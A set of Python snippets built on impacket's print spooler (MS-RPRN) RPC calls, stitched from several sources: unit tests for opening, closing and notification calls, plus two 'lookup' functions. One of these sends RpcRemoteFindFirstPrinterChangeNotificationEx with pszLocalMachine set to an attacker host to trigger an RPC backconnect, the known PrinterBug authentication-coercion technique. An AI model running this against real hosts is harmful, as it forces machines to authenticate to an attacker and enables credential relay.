def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self): dce, rpctransport = self.connect() resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine) try: resp = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, resp['pHandle'], rprn.PRINTER_CHANGE_ADD_JOB, pszLocalMachine = '\\\\%s\x00' % self.machine ) resp.dump() except Exception as e: if str(e).find('ERROR_INVALID_HANDLE') < 0: raise
def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self): dce, rpctransport = self.connect() resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % self.machine) with assertRaisesRegex(self, rprn.DCERPCSessionError, "ERROR_INVALID_HANDLE"): rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx( dce, resp['pHandle'], rprn.PRINTER_CHANGE_ADD_JOB, pszLocalMachine="\\\\%s\x00" % self.machine)
def call_open_printer(dce): global debug logging.info("getting context handle...") try: resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target) if debug == True: logging.debug("raw response: ") resp.dump() logging.debug("handle is: %s" % binascii.hexlify(resp['pHandle'])) except Exception as e: logging.error("exception " + str(e)) dce.disconnect() sys.exit() return resp['pHandle']
def lookup(self, rpctransport, host): if self.__tcp_ping and self.ping(host) is False: logging.info("Host is offline. Skipping!") return dce = rpctransport.get_dce_rpc() try: dce.connect() except Exception as e: # Probably this isn't a Windows machine or SMB is closed logging.error("Timeout - Skipping host!") return dce.bind(rprn.MSRPC_UUID_RPRN) logging.info('Bind OK') try: resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) except Exception as e: if str(e).find('Broken pipe') >= 0: # The connection timed-out. Let's try to bring it back next round logging.error('Connection failed - skipping host!') return elif str(e).upper().find('ACCESS_DENIED'): # We're not admin, bye logging.error('Access denied - RPC call was denied') dce.disconnect() return else: raise logging.info('Got handle') request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost request['pOptions'] = NULL try: resp = dce.request(request) except Exception as e: print(e) logging.info( 'Triggered RPC backconnect, this may or may not have worked') dce.disconnect() return None
def lookup(self, rpctransport, host): dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(rprn.MSRPC_UUID_RPRN) logging.critical('Bind OK') try: resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) except Exception, e: if str(e).find('Broken pipe') >= 0: # The connection timed-out. Let's try to bring it back next round logging.error('Connection failed - skipping host!') return False elif str(e).upper().find('ACCESS_DENIED'): # We're not admin, bye logging.error('Access denied - RPC call was denied') dce.disconnect() return False else: return False
def test_hRpcClosePrinter(self): dce, rpctransport = self.connect() resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine) resp.dump() resp = rprn.hRpcClosePrinter(dce, resp['pHandle']) resp.dump()